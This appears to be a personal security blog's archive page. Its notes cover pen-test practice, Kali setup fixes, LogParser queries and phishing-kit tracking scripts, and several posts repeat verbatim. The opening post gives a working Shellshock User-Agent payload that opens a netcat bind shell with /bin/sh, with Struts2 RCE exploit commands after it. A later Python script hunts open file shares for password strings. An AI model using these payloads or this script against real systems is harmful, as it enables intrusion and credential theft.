when practicing pen testing on CVE-2014-6271
Burp Suite proxy, repeater, modify user agent
GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
the repeater will not return because it's waiting for a connection now
open another prompt and launch netcat to connect to port 9999
nc xxx.xxx.xxx.xxx 9999
you are now at the /bin/sh prompt for the compromised system so you can type a command like
"whoami"
Sunday, December 23, 2018
CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
I found this github page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
https://github.com/mazen160/struts-pwn_CVE-2017-9805
https://github.com/mazen160/struts-pwn_CVE-2017-9805
Check if the vulnerability exists against a single URL.
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'Exploit a single URL.
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'kali metasploit website auxillary modules
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
list all nmap scripts available
to see all the nmap scripts available you can list out this directory
ls /usr/share/nmap/scripts/
ls /usr/share/nmap/scripts/
vmware tools kali linux vmplayer
if you got kali linux and the vmware tools isn't working in vmplayer follow these instructions
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
dirbuster wordlist folder location
If you need a wordlist of directories for the dirbust tool they are located here on a default kali install
/usr/share/wordlists/dirbuster/
/usr/share/wordlists/dirbuster/
Saturday, December 22, 2018
apt-get update fails on Kali KEYEXPIRED
if
apt-get update
apt-get update
fails on Kali
with an error like this
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Err:1 http://kali.download/kali kali-rolling InRelease
The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
Fetched 30.5 kB in 8s (3,483 B/s)
Reading package lists... Done
W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Some index files failed to download. They have been ignored, or old ones used instead.
The fix appears to be these 2 commands that get new keys
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
Thursday, December 20, 2018
Qradar API basics
This is where you can find documentation on your qradar api's instance
https://<your qradar url>/api_doc
this tells you about all the various api calls available
you can make calls directly in the browser if your credentials have permission by going to a url such as
https://<your qradar url>/api/siem/offenses
this older blog post gives you more details about connecting the 1st time
https://neonprimetime.blogspot.com/2016/01/qradar-siem-api-101-walk-through.html
https://<your qradar url>/api_doc
this tells you about all the various api calls available
you can make calls directly in the browser if your credentials have permission by going to a url such as
https://<your qradar url>/api/siem/offenses
this older blog post gives you more details about connecting the 1st time
https://neonprimetime.blogspot.com/2016/01/qradar-siem-api-101-walk-through.html
py2exe does not work on python 3.6, use pyinstaller instead
py2exe does not work on python 3.6
use pyinstaller instead
py2exe throws this error
"IndexError: tuple index out of range"
so instead i get pyinstaller by doing this
> pip install pyinstaller
and then running
> pyinstaller.exe --onefile myscript.py
and it generates a working EXE
use pyinstaller instead
py2exe throws this error
"IndexError: tuple index out of range"
so instead i get pyinstaller by doing this
> pip install pyinstaller
and then running
> pyinstaller.exe --onefile myscript.py
and it generates a working EXE
openFileShareWalker.py
# open file share searcher for passwords or restricted documents
import argparse
import os
import re
#definitions
suspiciousFileNames = r'(?i)(\.config|\.txt|\.ini|\.pdf|\.doc|\.xls|\.java|\.sql|\.vbs|\.inf|pwd|password)'
passwordSearchableFileNames = r'(?i)(\.config|\.txt|\.ini|\.java|\.sql|\.vbs|\.inf)'
passwordKeywords = r'(?i)(pwd|password|passwd|getConnection|connectionString)'
falsePositiveFolders = r'(?i)(EPO_REPOSITORY|VSCANDAT|AdaptivaCache|SmsPkg|DriverPkg)'
falsePositiveFileNames = r'(?i)(license|avvdat|uninst)'
suspiciousFiles = []
passwordFiles = []
fileCount = 0
progressInterval = 10000
progressTracker = progressInterval
#arguments
arguments = argparse.ArgumentParser("Search Open File Shares for passwords and restricted documents")
arguments.add_argument("-f", "--folder", type=str, required=True, help="Full UNC path (\\server\share) of open file share to search (note: file:// does not work)")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-p", "--progress", action="store_true", required=False, help="Enable progress tracking")
settings = arguments.parse_args()
#processing
if(settings.debug or settings.progress):
print("starting walk of folder '{0}'".format(settings.folder))
for dname, dirs, files in os.walk(settings.folder):
if(settings.debug):
print("starting walk of sub-folder '{0}'".format(dname))
for fname in files:
fileCount = fileCount + 1
fpath = os.path.join(dname, fname)
if(settings.progress and fileCount >= progressTracker):
print("PROGRESS: {0} files analyzed so far".format(str(fileCount)))
progressTracker = progressTracker + progressInterval
if(settings.debug):
print("analyzing file '{0}'".format(fname))
folderBadMatch = re.search(falsePositiveFolders, fpath)
if(folderBadMatch is None):
match = re.search(suspiciousFileNames, fname)
if(match is not None):
fileBadMatch = re.search(falsePositiveFileNames, fname)
if(fileBadMatch is None):
if(settings.debug):
print("matched file '{0}'".format(fpath))
suspiciousFiles.append(fpath)
if(settings.debug):
print("finished analyzing file '{0}'".format(fname))
if(settings.debug):
print("finished walk of sub-folder '{0}'".format(dname))
if(settings.debug):
print("finished walk of folder '{0}'".format(settings.folder))
if(settings.debug or settings.progress):
print("starting password searching")
for file in suspiciousFiles:
isSearchable = re.search(passwordSearchableFileNames, file)
if(isSearchable is not None):
with open(file) as f:
if(settings.debug):
print("searching for passwords in '{0}'".format(file))
for line in f:
match = re.search(passwordKeywords, line)
if(match is not None):
passwordFiles.append((file, line))
if(settings.debug):
print("finished password searching")
#output
for file in suspiciousFiles:
print(file)
for (file, line) in passwordFiles:
print("POSSIBLE PASSWORD in '{0}' [{1}]".format(file, line))
import argparse
import os
import re
#definitions
suspiciousFileNames = r'(?i)(\.config|\.txt|\.ini|\.pdf|\.doc|\.xls|\.java|\.sql|\.vbs|\.inf|pwd|password)'
passwordSearchableFileNames = r'(?i)(\.config|\.txt|\.ini|\.java|\.sql|\.vbs|\.inf)'
passwordKeywords = r'(?i)(pwd|password|passwd|getConnection|connectionString)'
falsePositiveFolders = r'(?i)(EPO_REPOSITORY|VSCANDAT|AdaptivaCache|SmsPkg|DriverPkg)'
falsePositiveFileNames = r'(?i)(license|avvdat|uninst)'
suspiciousFiles = []
passwordFiles = []
fileCount = 0
progressInterval = 10000
progressTracker = progressInterval
#arguments
arguments = argparse.ArgumentParser("Search Open File Shares for passwords and restricted documents")
arguments.add_argument("-f", "--folder", type=str, required=True, help="Full UNC path (\\server\share) of open file share to search (note: file:// does not work)")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-p", "--progress", action="store_true", required=False, help="Enable progress tracking")
settings = arguments.parse_args()
#processing
if(settings.debug or settings.progress):
print("starting walk of folder '{0}'".format(settings.folder))
for dname, dirs, files in os.walk(settings.folder):
if(settings.debug):
print("starting walk of sub-folder '{0}'".format(dname))
for fname in files:
fileCount = fileCount + 1
fpath = os.path.join(dname, fname)
if(settings.progress and fileCount >= progressTracker):
print("PROGRESS: {0} files analyzed so far".format(str(fileCount)))
progressTracker = progressTracker + progressInterval
if(settings.debug):
print("analyzing file '{0}'".format(fname))
folderBadMatch = re.search(falsePositiveFolders, fpath)
if(folderBadMatch is None):
match = re.search(suspiciousFileNames, fname)
if(match is not None):
fileBadMatch = re.search(falsePositiveFileNames, fname)
if(fileBadMatch is None):
if(settings.debug):
print("matched file '{0}'".format(fpath))
suspiciousFiles.append(fpath)
if(settings.debug):
print("finished analyzing file '{0}'".format(fname))
if(settings.debug):
print("finished walk of sub-folder '{0}'".format(dname))
if(settings.debug):
print("finished walk of folder '{0}'".format(settings.folder))
if(settings.debug or settings.progress):
print("starting password searching")
for file in suspiciousFiles:
isSearchable = re.search(passwordSearchableFileNames, file)
if(isSearchable is not None):
with open(file) as f:
if(settings.debug):
print("searching for passwords in '{0}'".format(file))
for line in f:
match = re.search(passwordKeywords, line)
if(match is not None):
passwordFiles.append((file, line))
if(settings.debug):
print("finished password searching")
#output
for file in suspiciousFiles:
print(file)
for (file, line) in passwordFiles:
print("POSSIBLE PASSWORD in '{0}' [{1}]".format(file, line))
Wednesday, December 19, 2018
phishingKitTracker.py
# phishing kit parser, used to enrich kit and put into PhishingKitTracker csv format
# @neonprimetime
# https://github.com/neonprimetime/PhishingKitTracker/
import argparse
import zipfile
import urllib.request
from urllib.parse import urlparse
import os
from pathlib import Path
import re
from datetime import date
import hashlib
import shutil
#definitions
class PhishingKitTrackerEntry:
date = date.today().strftime('%m/%d/%Y')
reference = ""
email = ""
emailProvider = ""
mailer = ""
target = ""
domain = ""
zip = ""
threatActor = ""
md5 = ""
url = ""
entries = []
proceed = 1
domain = ""
mailer = ""
filename = ""
md5 = ""
threatActor = ""
itemList = []
isUrls = 0
extractedfoldername = ""
#arguments
arguments = argparse.ArgumentParser("Analyze Phishing Kit, pass 1 url or file to start")
arguments.add_argument("-u", "--url", type=str, required=False, help="Url to a Phishing Kit Zip file")
arguments.add_argument("-f", "--file", type=str, required=False, help="Path to a Phishing Kit Zip file")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-r", "--reference", type=str, required=False, help="Twitter url referencing Phishing Kit")
arguments.add_argument("-l", "--listUrls", type=str, required=False, help="Path to file with a list of Urls to Phishing Kit Zip files in it 1 per line")
arguments.add_argument("-i", "--listFiles", type=str, required=False, help="Path to file with a list of Phishing Kit Zip files 1 per line")
settings = arguments.parse_args()
if(settings.url is None):
if(settings.file is None):
if(settings.listUrls is None):
if(settings.listFiles is None):
if(settings.debug):
print("no url, file, or list param found")
proceed = 0
raise Exception("url (-u) or file (-f) or list (-l,-i) required")
else:
if(settings.debug):
print("list of files param found '{0}'".format(settings.listFiles))
with open(settings.listFiles) as f:
for line in f:
itemList.append(line.rstrip("\r\n"))
else:
if(settings.debug):
print("list of urls param found '{0}'".format(settings.listUrls))
with open(settings.listUrls) as f:
for line in f:
itemList.append(line.rstrip("\r\n"))
isUrls = 1
else:
if(settings.debug):
print("file param found'{0}'".format(settings.file))
itemList.append(settings.file)
else:
if(settings.debug):
print("url param found '{0}'".format(settings.url))
itemList.append(settings.url)
isUrls = 1
#processing
if(proceed == 1):
for item in itemList:
if(isUrls == 0):
filename = item
else:
try:
url = urlparse(item)
domain = url.netloc
filename = os.path.basename(url.path)
if(settings.debug):
print("found domain '{0}'".format(domain))
print("found filename '{0}'".format(filename))
urllib.request.urlretrieve(item, filename)
if(settings.debug):
print("url downloaded '{0}'".format(item))
except:
print("failed to download '{0}'".format(item))
continue
extractedfoldername = str(Path(filename).with_suffix(""))
if(settings.debug):
print("getting file hash for '{0}'".format(filename))
file = open(filename, 'rb')
with file:
md5 = hashlib.md5(file.read()).hexdigest()
if(settings.debug):
print("unzipping file '{0}' to '{1}'".format(filename,extractedfoldername))
with zipfile.ZipFile(filename,'r') as zip_ref:
zip_ref.extractall(extractedfoldername)
if(settings.debug):
print("file unzipped to '{0}'".format(extractedfoldername))
if(settings.debug):
print("starting search for Threat Actor Signatures")
foundActor = 0
for dname, dirs, files in os.walk(extractedfoldername):
if(foundActor == 0):
for fname in files:
fpath = os.path.join(dname, fname)
extension = os.path.splitext(fpath)[1]
if(settings.debug):
print("found file '{0}' with extension '{1}'".format(fpath,extension))
if(extension is not None and extension == ".php"):
if(settings.debug):
print("searching file '{0}'".format(fpath))
with open(fpath) as f:
line = f.read()
match = re.search(r'(?i)(created by|hacked by|coded by|edited by|signed by|made by)([^\r\n\=\+\"\'\,]+)\s+([\,\=\+\"\']|\-\-)', line)
if(match is not None):
threatActor = match.group(1) + match.group(2)
foundActor = 1
break
if(settings.debug):
print("finished search for Threat Actor Signatures")
if(settings.debug):
print("starting search for Threat Actor Emails")
for dname, dirs, files in os.walk(extractedfoldername):
for fname in files:
fpath = os.path.join(dname, fname)
mailer = os.path.basename(fpath)
extension = os.path.splitext(fpath)[1]
if(settings.debug):
print("found file '{0}' with extension '{1}'".format(fpath,extension))
if(extension is not None and extension == ".php"):
if(settings.debug):
print("searching file '{0}'".format(fpath))
with open(fpath) as f:
line = f.read()
matches = re.findall(r'[\w\.-]+@[\w\.-]+', line)
for match in matches:
if(settings.debug):
print("found threat actor email '{0}'".format(match))
entry = PhishingKitTrackerEntry()
if(settings.reference is not None):
entry.reference = settings.reference
entry.email = match
entry.emailProvider = match.split('@')[1].split('.')[0]
entry.mailer = mailer
entry.domain = domain
entry.zip = filename
entry.threatActor = threatActor
entry.md5 = md5
if(isUrls == 1):
entry.url = item
entries.append(entry)
if(settings.debug):
print("deleting zip '{0}'".format(filename))
if(filename is not None and filename != "" and ".zip" in filename):
os.remove(filename)
if(settings.debug):
print("deleting folder '{0}'".format(extractedfoldername))
if(extractedfoldername is not None and extractedfoldername != ""):
shutil.rmtree(extractedfoldername, ignore_errors=True)
if(settings.debug):
print("finished search for Threat Actor Emails")
else:
if(settings.debug):
print("exiting program, proceed={0}".format(str(proceed)))
#output
for entry in entries:
print("{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}".format(entry.date,entry.reference,entry.email,entry.emailProvider,entry.mailer,entry.target,entry.domain,entry.zip,entry.threatActor,entry.md5,entry.url))
# @neonprimetime
# https://github.com/neonprimetime/PhishingKitTracker/
import argparse
import zipfile
import urllib.request
from urllib.parse import urlparse
import os
from pathlib import Path
import re
from datetime import date
import hashlib
import shutil
#definitions
class PhishingKitTrackerEntry:
date = date.today().strftime('%m/%d/%Y')
reference = ""
email = ""
emailProvider = ""
mailer = ""
target = ""
domain = ""
zip = ""
threatActor = ""
md5 = ""
url = ""
entries = []
proceed = 1
domain = ""
mailer = ""
filename = ""
md5 = ""
threatActor = ""
itemList = []
isUrls = 0
extractedfoldername = ""
#arguments
arguments = argparse.ArgumentParser("Analyze Phishing Kit, pass 1 url or file to start")
arguments.add_argument("-u", "--url", type=str, required=False, help="Url to a Phishing Kit Zip file")
arguments.add_argument("-f", "--file", type=str, required=False, help="Path to a Phishing Kit Zip file")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-r", "--reference", type=str, required=False, help="Twitter url referencing Phishing Kit")
arguments.add_argument("-l", "--listUrls", type=str, required=False, help="Path to file with a list of Urls to Phishing Kit Zip files in it 1 per line")
arguments.add_argument("-i", "--listFiles", type=str, required=False, help="Path to file with a list of Phishing Kit Zip files 1 per line")
settings = arguments.parse_args()
if(settings.url is None):
if(settings.file is None):
if(settings.listUrls is None):
if(settings.listFiles is None):
if(settings.debug):
print("no url, file, or list param found")
proceed = 0
raise Exception("url (-u) or file (-f) or list (-l,-i) required")
else:
if(settings.debug):
print("list of files param found '{0}'".format(settings.listFiles))
with open(settings.listFiles) as f:
for line in f:
itemList.append(line.rstrip("\r\n"))
else:
if(settings.debug):
print("list of urls param found '{0}'".format(settings.listUrls))
with open(settings.listUrls) as f:
for line in f:
itemList.append(line.rstrip("\r\n"))
isUrls = 1
else:
if(settings.debug):
print("file param found'{0}'".format(settings.file))
itemList.append(settings.file)
else:
if(settings.debug):
print("url param found '{0}'".format(settings.url))
itemList.append(settings.url)
isUrls = 1
#processing
if(proceed == 1):
for item in itemList:
if(isUrls == 0):
filename = item
else:
try:
url = urlparse(item)
domain = url.netloc
filename = os.path.basename(url.path)
if(settings.debug):
print("found domain '{0}'".format(domain))
print("found filename '{0}'".format(filename))
urllib.request.urlretrieve(item, filename)
if(settings.debug):
print("url downloaded '{0}'".format(item))
except:
print("failed to download '{0}'".format(item))
continue
extractedfoldername = str(Path(filename).with_suffix(""))
if(settings.debug):
print("getting file hash for '{0}'".format(filename))
file = open(filename, 'rb')
with file:
md5 = hashlib.md5(file.read()).hexdigest()
if(settings.debug):
print("unzipping file '{0}' to '{1}'".format(filename,extractedfoldername))
with zipfile.ZipFile(filename,'r') as zip_ref:
zip_ref.extractall(extractedfoldername)
if(settings.debug):
print("file unzipped to '{0}'".format(extractedfoldername))
if(settings.debug):
print("starting search for Threat Actor Signatures")
foundActor = 0
for dname, dirs, files in os.walk(extractedfoldername):
if(foundActor == 0):
for fname in files:
fpath = os.path.join(dname, fname)
extension = os.path.splitext(fpath)[1]
if(settings.debug):
print("found file '{0}' with extension '{1}'".format(fpath,extension))
if(extension is not None and extension == ".php"):
if(settings.debug):
print("searching file '{0}'".format(fpath))
with open(fpath) as f:
line = f.read()
match = re.search(r'(?i)(created by|hacked by|coded by|edited by|signed by|made by)([^\r\n\=\+\"\'\,]+)\s+([\,\=\+\"\']|\-\-)', line)
if(match is not None):
threatActor = match.group(1) + match.group(2)
foundActor = 1
break
if(settings.debug):
print("finished search for Threat Actor Signatures")
if(settings.debug):
print("starting search for Threat Actor Emails")
for dname, dirs, files in os.walk(extractedfoldername):
for fname in files:
fpath = os.path.join(dname, fname)
mailer = os.path.basename(fpath)
extension = os.path.splitext(fpath)[1]
if(settings.debug):
print("found file '{0}' with extension '{1}'".format(fpath,extension))
if(extension is not None and extension == ".php"):
if(settings.debug):
print("searching file '{0}'".format(fpath))
with open(fpath) as f:
line = f.read()
matches = re.findall(r'[\w\.-]+@[\w\.-]+', line)
for match in matches:
if(settings.debug):
print("found threat actor email '{0}'".format(match))
entry = PhishingKitTrackerEntry()
if(settings.reference is not None):
entry.reference = settings.reference
entry.email = match
entry.emailProvider = match.split('@')[1].split('.')[0]
entry.mailer = mailer
entry.domain = domain
entry.zip = filename
entry.threatActor = threatActor
entry.md5 = md5
if(isUrls == 1):
entry.url = item
entries.append(entry)
if(settings.debug):
print("deleting zip '{0}'".format(filename))
if(filename is not None and filename != "" and ".zip" in filename):
os.remove(filename)
if(settings.debug):
print("deleting folder '{0}'".format(extractedfoldername))
if(extractedfoldername is not None and extractedfoldername != ""):
shutil.rmtree(extractedfoldername, ignore_errors=True)
if(settings.debug):
print("finished search for Threat Actor Emails")
else:
if(settings.debug):
print("exiting program, proceed={0}".format(str(proceed)))
#output
for entry in entries:
print("{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}".format(entry.date,entry.reference,entry.email,entry.emailProvider,entry.mailer,entry.target,entry.domain,entry.zip,entry.threatActor,entry.md5,entry.url))
Wednesday, December 12, 2018
regex extract zip, php, email from grep of phishingkit
after using this grep
https://neonprimetime.blogspot.com/2018/12/grep-recursively-phishing-kit-zip-for.html
in notepad++ you can regex out the zip name, php file name, and email address
replace this
\r\n([^\\]+)\\[^\r]+\\([^\\]+\.php)\:[^\r]+(\"|\')([^\"\'\r]+)(\"|\')[^\r]*
with this
\r\n\1,\2,\4
Monday, December 3, 2018
findstr recursively phishing kit zip for email
after unzipped
findstr /S "@" *.php | findstr "$" | findstr "=" | findstr ";" | findstr "." | findstr /I /V "From" | findstr /I /V "headers" |findstr /I /V "function" | findstr /I /V "key" | findstr /I /V "indexOf" | findstr /I /V "class" | findstr /I /V "isset" | findstr /I /V "@date" | findstr /I /V "server" | findstr /I /V "http" | findstr /I /V "css" | findstr /I /V "style" | findstr /I /V "?" | findstr /I /V "@eval"
Saturday, December 1, 2018
grep recursively phishing kit zip for email
find email
// $send = "bad@bad.com";
grep -r -P '\=\s*.([a-zA-Z][\w\_\.]{5,20})\@([a-zA-Z0-9.-]+)\.([a-zA-Z]{2,4})' | grep -v -P '(?i)(from|headers|array|messsage|find|domain)'
// mail("bad@bad.com", ...)
grep -r -P 'mail\([^\r\n]+\@'
find who created it
// ------ HACKED BY Somebody ----------
grep -r -P "(?i)(Created By|Hacked by|Coded by|Edited By|Signed by|Made by)" * | grep -v function
unzip all files to folder with same name
unzip files to a folder with the same name
>ls
abc.zip
bob.zip
test.zip
>find . -name "*.zip" | while read filename; do unzip -o -d "`basename -s .zip "$filename"`" "$filename"; done;
>ls
abc
abc.zip
bob
bob.zip
test
test.zip
wget -i Urls.txt
download a list of #phishingkit zips
put files into urls.txt
run command
wget -i urls.txt
Friday, November 30, 2018
PhishingKitTracker by neonprimetime
#infosec community
I've recorded the #threatactoremail from each #phishingkit for the last year & started tracking them out on @GitHub to share with you. My hope is this can somehow be used to fight the onslaught of #phishing seen daily
See the list
https://github.com/neonprimetime/PhishingKitTracker/blob/master/PhishingKitTracker.csv
I have 500 phishing kits so far and the data paints some interesting pictures. Such as 82% of the phishing kits I tracked use a @Gmail account to receive the stolen creds. I've also found threat actors that re-use so you can perhaps link together campaigns.
A big thank you, all the credit for the data goes to the #infosec community on twitter that hunts and finds all the evil #phishing sites such as @TechHelpListCom @IpNigh @ANeilan @leunammejii @ActorExpose @n0p1shing @dave_daves @FewAtoms @nullcookies @PhishingAi@jcybersec_ @JonSelman @MaelSecurity @demonslay335 @dms1899 @malware_traffic @olihough86 @packet_Wire @ps66uk @Ring0x0 @sS55752750 @teoseller @tiketiketikeke @ViriBack @WifiRumHam @PhishTank_Bot and everyone else in the community
If anybody knows people @Gmail , @Yandex, @Yahoo, @Zoho, @ProtonMail that care about this type of data and could perhaps help the #infosec community start streamline reporting or detection of these email accounts that receive stolen creds daily that's be sweet.
If anybody knows a better place to upload zipped up phishing kits than VT , I'd love to be sharing and archiving them somewhere the whole community has access to.
If anybody every has #phishing threat actor emails they wanted appended to this list just CC me and I'll do my best to get them added
If anybody has suggestions on better ways to do this & share w/ the community, extra data/fields to track, etc. I'm all open ears, for example if somebody wanted to build a tracker website for the community to use you'd be my hero ! Otherwise, HAPPY FRIDAY
https://github.com/neonprimetime/PhishingKitTracker/blob/master/PhishingKitTracker.csv
I have 500 phishing kits so far and the data paints some interesting pictures. Such as 82% of the phishing kits I tracked use a @Gmail account to receive the stolen creds. I've also found threat actors that re-use so you can perhaps link together campaigns.
A big thank you, all the credit for the data goes to the #infosec community on twitter that hunts and finds all the evil #phishing sites such as @TechHelpListCom @IpNigh @ANeilan @leunammejii @ActorExpose @n0p1shing @dave_daves @FewAtoms @nullcookies @PhishingAi@jcybersec_ @JonSelman @MaelSecurity @demonslay335 @dms1899 @malware_traffic @olihough86 @packet_Wire @ps66uk @Ring0x0 @sS55752750 @teoseller @tiketiketikeke @ViriBack @WifiRumHam @PhishTank_Bot and everyone else in the community
If anybody knows people @Gmail , @Yandex, @Yahoo, @Zoho, @ProtonMail that care about this type of data and could perhaps help the #infosec community start streamline reporting or detection of these email accounts that receive stolen creds daily that's be sweet.
If anybody knows a better place to upload zipped up phishing kits than VT , I'd love to be sharing and archiving them somewhere the whole community has access to.
If anybody every has #phishing threat actor emails they wanted appended to this list just CC me and I'll do my best to get them added
If anybody has suggestions on better ways to do this & share w/ the community, extra data/fields to track, etc. I'm all open ears, for example if somebody wanted to build a tracker website for the community to use you'd be my hero ! Otherwise, HAPPY FRIDAY
Wednesday, November 28, 2018
LogParser basic syntax
LogParser.exe -i:EVT -h [prints the columns available on that event log type]
# Windows Auth (Security)
# Windows Auth (Security)
select where LogonType <> '3'
LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings, 8, '|') as LogonType,EXTRACT_TOKEN(Strings, 17, '|') AS ProcessName,EXTRACT_TOKEN(Strings, 18, '|') AS SourceIP FROM logs.evtx where EventID=4624 and EXTRACT_TOKEN(Strings, 8, '|') <> '3'"
LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings, 8, '|') as LogonType,EXTRACT_TOKEN(Strings, 17, '|') AS ProcessName,EXTRACT_TOKEN(Strings, 18, '|') AS SourceIP FROM logs.evtx where EventID=4624 and EXTRACT_TOKEN(Strings, 8, '|') <> '3'"
# Windows Task Scheduler
LogParser.exe -i:EVT "SELECT EXTRACT_TOKEN(Strings, 0, '|') as TaskName, EXTRACT_TOKEN(Strings, 1, '|') as Path, EXTRACT_TOKEN(Strings, 2, '|') as ProcessId, EXTRACT_TOKEN(Strings, 3, '|') AS Priority FROM Microsoft-Windows-TaskScheduler%4Operational.evtx where EventID = 129 and EXTRACT_TOKEN(Strings, 1, '|') not like '%Sophos%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%GoogleUpdate%' and EXTRACT_TOKEN(Strings, 0, '|') not like '%Database One%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%Small Business%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%Solutions BPA%'
LogParser.exe -i:EVT "select * from security.evtx" -rtp:-1
LogParser.exe -i:EVT "select * from security.evtx_ where eventid=4703" -rtp:-1
LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc" -rtp:-1
LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc" -rtp:-1 -o:csv > out.csv
LogParser.exe -i:EVT "select timegenerated from system.evtx_ where message not like '%description for%' AND timegenerated >= '2018-11-26 05:00:00' and timegenerated <= '2018-11-26 18:00:00'" -rtp:-1
LogParser.exe -i:EVT "select timegenerated, strings from security.evtx_ where strings not like '%privilege%'" -rtp:-1 -o:csv > out.csv
NOTE:
The rtp parameter suppresses the "press a key" paging feature that is default for log parser
-rtp:-1
NOTE:
If you get "The description for event id ... cannot be found" for every message it might be because
LogParser.exe -i:EVT "select * from security.evtx" -rtp:-1
LogParser.exe -i:EVT "select * from security.evtx_ where eventid=4703" -rtp:-1
LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc" -rtp:-1
LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc" -rtp:-1 -o:csv > out.csv
LogParser.exe -i:EVT "select timegenerated from system.evtx_ where message not like '%description for%' AND timegenerated >= '2018-11-26 05:00:00' and timegenerated <= '2018-11-26 18:00:00'" -rtp:-1
LogParser.exe -i:EVT "select timegenerated, strings from security.evtx_ where strings not like '%privilege%'" -rtp:-1 -o:csv > out.csv
NOTE:
The rtp parameter suppresses the "press a key" paging feature that is default for log parser
-rtp:-1
NOTE:
If you get "The description for event id ... cannot be found" for every message it might be because
user account needs the"Manage auditing and security log." permission
Sunday, November 25, 2018
#phishingkit 10/2017 to 11/26/2018 from Twitter
This summary is not available. Please
click here to view the post.
Subscribe to:
Posts (Atom)